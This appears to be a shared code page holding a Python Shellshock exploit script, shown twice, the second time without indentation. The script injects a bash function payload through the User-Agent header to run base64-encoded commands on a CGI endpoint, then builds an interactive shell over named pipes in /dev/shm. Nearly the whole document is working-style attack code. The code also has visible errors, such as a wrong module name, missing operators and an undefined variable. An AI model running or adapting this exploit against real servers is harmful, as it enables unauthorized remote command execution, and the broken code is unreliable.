RomaniukVadim · November 18, 2018 17:45
diff --git a/shellshock_tty.py b/shellshock_tty.py
 import requests
 import time
 from base64 import b64encode
 from random import randrange
 import threading

 class AllTheReads(object):
 	def __init__(self, interval=1):
 		self.interval = interval
 		thread = threading.Thread(target=self.run, args=())
 		thread.daemon = True
 		thread.start()
 	def run(self):
 		readoutput = """/bin/cat %s""" % (stdout)
 		clearoutput = """echo '' > %s """ % (stdout)
 		while True:
 			output = RunCmd(readoutput)
 			if output:					
 				RunCmd(clearoutput)
 				time.sleep(self.interval)
 def RunCmd(cmd):
 	cmd = cmd.encode('utf-8')
 	cmd = b64encode(cmd).decode('utf-8')
 	headers = {
 		'User-Agent' : '() { :; }; echo "Content-Type: text/html"; echo; export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin; echo "%s" | base64 -d | sh'} % (cmd)
 	}
 	result = (request.get('http://172.16.10.138:591/cgi-bin/cat', headers=headers, timeout=5).text).strip()
 	return result

 def WriteCmd(cmd):
 	cmd = cmd.encode('utf-8')
 	cmd = b64encode(cmd).decode('utf-8')
 	 headers = {
                'User-Agent' : '() { :; }; echo "Content-Type: text/html"; echo; export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin; echo "%s" | base64 -d > %s' (cmd, stdin) 
        }
        result = (request.get('http://172.16.10.138:591/cgi-bin/cat', headers=headers, timeout=5).text).strip()
        return result

 def ReadCmd(cmd):
 	output = """/bin/cat %s """ % (stdout)
 	output = RunCmd(GetOutput)
 	return output

 def SetupShell():
 	NamedPipes = """mkfifo %s; tail -f %s | /bin/sh 2>&1 %s """ (stdin, stdin, stdout)
 	try:
 		RunCmd(NamedPipes)
 	except:
 		None		
 	return None

 global stdin, stdout
 session = randrange(1000,9999)
 stdin = "/dev/shm/input.%s" % (session)
 stdout "/dev/shm/output.%s" % (session)
 clearoutput = """echo '' > %s """ % (stdout)

 SetupShell()

 ReadingTheThings = AllTheReads()

 while True:
 	cmd = input("> ")
 	WriteCmd(cmd + "\n")
 	time.sleep(1.1)
	import requests
	import time
	from base64 import b64encode
	from random import randrange
	import threading

	class AllTheReads(object):
	def __init__(self, interval=1):
	self.interval = interval
	thread = threading.Thread(target=self.run, args=())
	thread.daemon = True
	thread.start()
	def run(self):
	readoutput = """/bin/cat %s""" % (stdout)
	clearoutput = """echo '' > %s """ % (stdout)
	while True:
	output = RunCmd(readoutput)
	if output:
	RunCmd(clearoutput)
	time.sleep(self.interval)
	def RunCmd(cmd):
	cmd = cmd.encode('utf-8')
	cmd = b64encode(cmd).decode('utf-8')
	headers = {
	'User-Agent' : '() { :; }; echo "Content-Type: text/html"; echo; export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin; echo "%s" \| base64 -d \| sh'} % (cmd)
	}
	result = (request.get('http://172.16.10.138:591/cgi-bin/cat', headers=headers, timeout=5).text).strip()
	return result

	def WriteCmd(cmd):
	cmd = cmd.encode('utf-8')
	cmd = b64encode(cmd).decode('utf-8')
	headers = {
	'User-Agent' : '() { :; }; echo "Content-Type: text/html"; echo; export PATH=/usr/local/bin:/usr/bin:/bin:/usr/local/sbin; echo "%s" \| base64 -d > %s' (cmd, stdin)
	}
	result = (request.get('http://172.16.10.138:591/cgi-bin/cat', headers=headers, timeout=5).text).strip()
	return result

	def ReadCmd(cmd):
	output = """/bin/cat %s """ % (stdout)
	output = RunCmd(GetOutput)
	return output

	def SetupShell():
	NamedPipes = """mkfifo %s; tail -f %s \| /bin/sh 2>&1 %s """ (stdin, stdin, stdout)
	try:
	RunCmd(NamedPipes)
	except:
	None
	return None

	global stdin, stdout
	session = randrange(1000,9999)
	stdin = "/dev/shm/input.%s" % (session)
	stdout "/dev/shm/output.%s" % (session)
	clearoutput = """echo '' > %s """ % (stdout)

	SetupShell()

	ReadingTheThings = AllTheReads()

	while True:
	cmd = input("> ")
	WriteCmd(cmd + "\n")
	time.sleep(1.1)